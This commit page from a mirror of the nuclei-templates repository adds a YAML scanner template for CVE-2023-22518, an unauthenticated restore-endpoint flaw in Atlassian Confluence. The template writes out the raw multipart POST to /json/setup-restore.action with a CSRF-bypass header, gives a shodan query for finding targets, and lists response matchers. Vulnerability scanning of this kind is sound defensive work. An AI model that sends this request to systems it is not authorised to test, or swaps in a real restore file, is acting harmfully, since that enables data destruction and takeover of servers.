daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added CVE-2023-22518 (#8528)

patch-1
Sandeep Singh 2023-11-03 00:06:47 +05:30 committed by GitHub
parent 7bcd32994d
commit b57d75dc34
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 57 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
http/cves/2023/CVE-2023-22518.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2023-22518
info:
name: Atlassian Confluence Server - Improper Authorization
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.
Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
reference:
- https://confluence.atlassian.com/pages/viewpage.action?pageId=1311473907
- https://blog.projectdiscovery.io/atlassian-confluence-auth-bypass/
- https://jira.atlassian.com/browse/CONFSERVER-93142
- https://nvd.nist.gov/vuln/detail/CVE-2023-22518
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2023-22518
epss-score: 0.00043
epss-percentile: 0.0726
metadata:
verified: true
max-request: 1
vendor: atlassian
product: confluence_data_center
shodan-query: http.component:"Atlassian Confluence"
note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts.
tags: cve,cve2023,atlassian,confluence,rce,unauth
http:
- raw:
- |
POST /json/setup-restore.action HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7
X-Atlassian-Token: no-check
------WebKitFormBoundaryT3yekvo0rGaL9QR7
Content-Disposition: form-data; name="buildIndex"
true
------WebKitFormBoundaryT3yekvo0rGaL9QR7
Content-Disposition: form-data; name="file";filename="{{randstr}}.zip"
{{randstr}}
------WebKitFormBoundaryT3yekvo0rGaL9QR7
Content-Disposition: form-data; name="edit"
Upload and import
------WebKitFormBoundaryT3yekvo0rGaL9QR7--
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"
condition: and